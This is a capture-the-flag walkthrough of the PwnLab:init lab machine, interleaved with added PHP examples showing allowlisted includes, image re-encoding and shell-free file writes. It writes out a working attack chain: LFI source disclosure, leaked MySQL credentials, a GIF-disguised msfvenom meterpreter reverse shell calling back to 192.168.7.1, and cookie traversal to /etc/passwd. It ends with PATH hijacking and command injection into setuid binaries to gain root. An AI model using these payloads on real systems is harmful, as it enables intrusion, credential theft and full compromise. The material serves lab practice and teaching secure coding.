Information gathering
nmap -sn 192.168.7.1/24
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.1
Host is up (0.00071s latency).
Nmap scan report for 192.168.7.130
Host is up (0.00060s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.130
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 44040/tcp status
|_ 100024 1 51756/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 53
| Version: .5.47-0+deb8u1
| Thread ID: 84
| Capabilities flags: 63487
| Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient
| Status: Autocommit
|_ Salt: "]0w'Xi((0XLS:j'"r<q
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds
- Ports 80 and 3306 are open and the system is Debian; let's open the web site and take a look.
- The URLs follow a pattern: the value after page looks like a file name without an extension.
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
}
?>
We guess the index code does something like the snippet above.
http://192.168.7.130/?page=login
http://192.168.7.130/?page=upload
- An LFI (local file inclusion) vulnerability is likely.
- Construct the URL
http://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login
- The file contents come back through the inclusion; base64-decode them.
---login.php---
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{
$luser = $_POST['user'];
$lpass = base64_encode($_POST['pass']);
$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);
$stmt->execute();
$stmt->store_Result();
if ($stmt->num_rows == 1)
{
$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{
echo "Login failed.";
}
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
- Next, read out the config.php that require loads:
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
- While at it, read index and upload too.
---index---
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
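Both inclusions in index (the page parameter with ".php" appended and the lang cookie under lang/) build the include path from request data, which is why a php://filter wrapper and a traversal to upload/ both work. An allowlist version, added here as an illustration and not code from the PwnLab image, is below; the function names, the PAGES/LANGS maps and the sample inputs are all constructed for it.

```php
<?php
// Added example, not code from the PwnLab image: an allowlist replacement for
// include($_GET['page'].".php") and include("lang/".$_COOKIE['lang']).
// The function names, the PAGES/LANGS maps and the sample inputs are all
// constructed for this illustration.
declare(strict_types=1);

// Every includable file is named here; the request value is only a lookup key.
const PAGES = [
    'login'  => __DIR__ . '/login.php',
    'upload' => __DIR__ . '/upload.php',
];
const LANGS = [
    'en' => __DIR__ . '/lang/en.lang.php',
];

// Reduce a request value (GET parameter or cookie) to a string or null.
// A value like page[]=x arrives as an array and is treated as absent.
function string_param($value): ?string
{
    return is_string($value) ? $value : null;
}

// Map a key to a file path, or return null when it is not on the allowlist.
// The untrusted value never becomes part of the path, so stream wrappers such
// as php://filter and traversal such as ../upload/x.gif never reach include().
function resolve_include(array $allowlist, ?string $key): ?string
{
    if ($key === null) {
        return null;
    }
    // Exact-match lookup only: no normalisation, prefixing or suffixing.
    return $allowlist[$key] ?? null;
}

// Drop-in use inside index.php:
//   $lang = resolve_include(LANGS, string_param($_COOKIE['lang'] ?? null));
//   if ($lang !== null) { include $lang; }
//   $page = resolve_include(PAGES, string_param($_GET['page'] ?? null));
//   if ($page !== null) { include $page; }
//   else { echo "Use this server to upload and share image files inside the intranet"; }

// Constructed sample inputs, mirroring the requests seen in the write-up.
$samples = [
    ['page', 'login'],
    ['page', 'php://filter/convert.base64-encode/resource=login'],
    ['lang', 'en'],
    ['lang', '../../../../../../etc/passwd'],
    ['lang', '../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif'],
    ['page', ['x']], // array-valued parameter
];
foreach ($samples as [$param, $value]) {
    $map  = $param === 'page' ? PAGES : LANGS;
    $file = resolve_include($map, string_param($value));
    printf("%s=%-50s -> %s\n", $param, json_encode($value), $file ?? 'REJECTED');
}
```

Appending ".php" to the page value is not a defence on its own: the filter wrapper still names login.php as its resource, so the suffix is satisfied. Only the lookup-table approach, where the request value never becomes part of a path, removes both the wrapper and the traversal cases at once.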
---upload---
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>
- We already have the MySQL credentials from above, and the nmap scan showed that port 3306 is open.
mysql -h 192.168.7.130 -u root -D Users -p
The password is the one in the config file; decode it yourself.
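The upload handler above checks the extension, the client-supplied Content-Type and the getimagesize() MIME, all of which a file that merely starts with an image signature satisfies. A hardened handler, added here as an example and not the PwnLab upload code, re-encodes the image so that only pixel data is stored; the function names and the constructed sample file are invented for the illustration, and the GD extension is assumed to be available.

```php
<?php
// Added example, not the PwnLab upload code: a hardened replacement for the
// handler above. Function names and the constructed sample file are invented
// for this illustration; the GD extension is assumed to be installed.
declare(strict_types=1);

// Only types we can decode and re-encode with GD are accepted. The key is the
// MIME type derived from the file header by getimagesize(), never the
// client-controlled Content-Type field that upload.php trusted in $filetype.
const ALLOWED_IMAGES = [
    'image/gif'  => ['ext' => 'gif', 'load' => 'imagecreatefromgif',  'save' => 'imagegif'],
    'image/jpeg' => ['ext' => 'jpg', 'load' => 'imagecreatefromjpeg', 'save' => 'imagejpeg'],
    'image/png'  => ['ext' => 'png', 'load' => 'imagecreatefrompng',  'save' => 'imagepng'],
];

// Re-encode $srcPath into $uploadDir and return the new path, or null with
// $error set. Only pixel data survives re-encoding, so bytes appended after a
// valid image header (the "GIF89a" trick above) do not reach the stored file.
function sanitize_image(string $srcPath, string $uploadDir, ?string &$error = null): ?string
{
    $info = @getimagesize($srcPath);
    if ($info === false || !isset(ALLOWED_IMAGES[$info['mime']])) {
        $error = 'not a supported image';
        return null;
    }
    $spec = ALLOWED_IMAGES[$info['mime']];
    $img  = @$spec['load']($srcPath);          // GD refuses files that are not real images
    if ($img === false) {
        $error = 'image could not be decoded';
        return null;
    }
    // Server-generated name: no user input in the path, extension fixed by the
    // detected type rather than taken from the original file name.
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $spec['ext'];
    $ok   = $spec['save']($img, $dest);
    imagedestroy($img);
    if (!$ok) {
        $error = 'could not write image';
        return null;
    }
    return $dest;
}

// Entry point for a multipart upload: checks the PHP upload status first, then
// hands the temporary file to sanitize_image(). Usage in upload.php:
//   $path = store_upload($_FILES['file'], __DIR__ . '/upload', $err);
function store_upload(array $file, string $uploadDir, ?string &$error = null): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {   // not "<= 0"
        $error = 'upload failed';
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        $error = 'not an uploaded file';
        return null;
    }
    return sanitize_image($file['tmp_name'], $uploadDir, $error);
}

// Constructed sample: a file that is "GIF89a" followed by PHP source, the same
// shape as the upload in the write-up, passed through sanitize_image().
$tmpDir = sys_get_temp_dir();
$fake   = tempnam($tmpDir, 'img');
file_put_contents($fake, "GIF89a" . "<?php echo 'not an image'; ?>");
$stored = sanitize_image($fake, $tmpDir, $err);
if ($stored === null) {
    echo "rejected: $err\n";
} else {
    // If GD managed to decode something, the output is a fresh GIF with no PHP in it.
    $hasPhp = strpos((string) file_get_contents($stored), '<?php') !== false;
    echo "re-encoded to $stored, contains '<?php': ", var_export($hasPhp, true), "\n";
    unlink($stored);
}
unlink($fake);
```

Re-encoding is what breaks the chain in this write-up: whether GD rejects the file or decodes a stub image, the text after the header is gone before anything is written to upload/. It belongs alongside two deployment measures: the upload directory served with PHP execution disabled (in Apache, php_admin_flag engine off in a Directory block, or storing the files outside the document root), and an allowlisted include in index so that nothing under upload/ can ever be include()d.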
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.00 sec)
mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |---JWzXuBJJNy
| mike | U0lmZHNURW42SQ== |---SIfdsTEn6I
| kane | aVN2NVltMkdSbw== |---iSv5Ym2GRo
+------+------------------+
3 rows in set (0.01 sec)
- Log in and try uploading a file. From the source above we know only image extensions are accepted, and the file type and MIME type are checked as well.
Bypassing the upload filter
- Method 1: prepend an image signature to the webshell to get past the checks
echo GIF89a > kali.gif
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >>kali.gif
- Method 2: use Burp Suite; you all know it better than I do.
- After the upload, a relative path is returned; the file name is the MD5 hash.
upload/51c65dd716e81189745d6eb1c9f1bb6b.gif
- Requesting it directly will not execute it, but index has another file inclusion whose path is passed in through a cookie.
curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>
- That works. Replace ../../../../etc/passwd with the path of the webshell uploaded earlier:
curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"
- The meterpreter side now has a session.
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800
meterpreter >
Privilege escalation
- Same routine as before:
python -c 'import pty;pty.spawn("/bin/bash")'
Try the database passwords against each user account.
- kane's password works. In his home directory there is an ELF executable owned by mike.
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
- It fails because the file in mike's home directory does not exist. Pull the binary back for analysis: start a simple HTTP server on the target with
python -m SimpleHTTPServer
and open 192.168.7.130:8000 in a browser.
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -
192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -
192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -
- A quick look in IDA shows it runs
cat /home/mike/msg.txt
through a system function call, with cat given as a bare command name, so we point the environment variable at the current directory.
- By modifying the PATH variable, this "cat" becomes a shell:
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat
echo "/bin/bash" > cat
kane@pwnlab:~$ ls
ls
cat msgmike
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$
- The user is now mike. Restore PATH with
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
and things work again. In mike's home directory there is a file msg2root.
Dropping it into IDA as well shows the string "/bin/echo %s >> /root/messages.txt".
- It echoes the user-supplied string into that file, but if the string contains a command separator, whatever follows it is executed as the next command, and as root.
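The two binaries fail in the same way: msgmike runs a bare "cat" that the caller's PATH resolves, and msg2root pastes the message into a shell command line. They are native executables, but the pattern and its fixes are shown below in PHP, the language of the rest of this box, as an added example that is not code from the PwnLab binaries; the function names and sample inputs are constructed for the illustration.

```php
<?php
// Added example, not code from the PwnLab binaries. msgmike and msg2root are
// native executables, but the two mistakes found in IDA (a bare "cat" resolved
// through the caller's PATH, and a user string pasted into a shell command) are
// shown here in PHP, the language of the rest of this box. Function names and
// sample inputs are constructed for the illustration.
declare(strict_types=1);

// The msg2root pattern: the message becomes part of a shell command line, so a
// separator in the message ends the echo and starts a second command.
function unsafe_message_command(string $msg): string
{
    return "/bin/echo " . $msg . " >> /root/messages.txt";
}

// Fix 1: if a shell must be involved, quote the argument so the shell sees it
// as a single word. escapeshellarg() single-quotes the value and escapes any
// embedded single quotes. The program is named by absolute path so the
// caller's PATH plays no part (the msgmike mistake).
function quoted_message_command(string $msg): string
{
    return "/bin/echo " . escapeshellarg($msg) . " >> /root/messages.txt";
}

// Fix 2 (preferred): no shell at all. Appending to a file needs no command,
// and the message is written byte for byte whatever it contains.
function append_message(string $file, string $msg): bool
{
    return file_put_contents($file, $msg . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Constructed sample inputs, including the one used in the write-up.
$messages = ['hello root', 'id ; whoami', 'asdasdasdas;/bin/sh', "it's $(id)"];
$log = tempnam(sys_get_temp_dir(), 'msg');
foreach ($messages as $m) {
    echo "input        : $m\n";
    echo "  unsafe cmd : ", unsafe_message_command($m), "\n";
    echo "  quoted cmd : ", quoted_message_command($m), "\n";
    append_message($log, $m);
}
// Everything, separators included, ends up as plain text in the file.
echo "file contents:\n", file_get_contents($log);
unlink($log);
```

For a setuid program the same two rules apply directly: name every helper by absolute path (or do the work without spawning one, as append_message does), and never hand user input to a shell as part of a command string. The quoted form is a fallback for cases where a shell genuinely cannot be avoided; the file-append form removes the command interpreter, and with it the injection, entirely.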
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id ; whoami
id ; whoami
id
root
mike@pwnlab:/home/mike$
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: asdasdasdas;/bin/sh
asdasdasdas;/bin/sh
asdasdasdas
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
cd /root
ls
flag.txt messages.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ | | (__ _)
( _ __) | / / ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ | '_ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/ (_) | | | | (_| | | | (_| | |_\__ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
#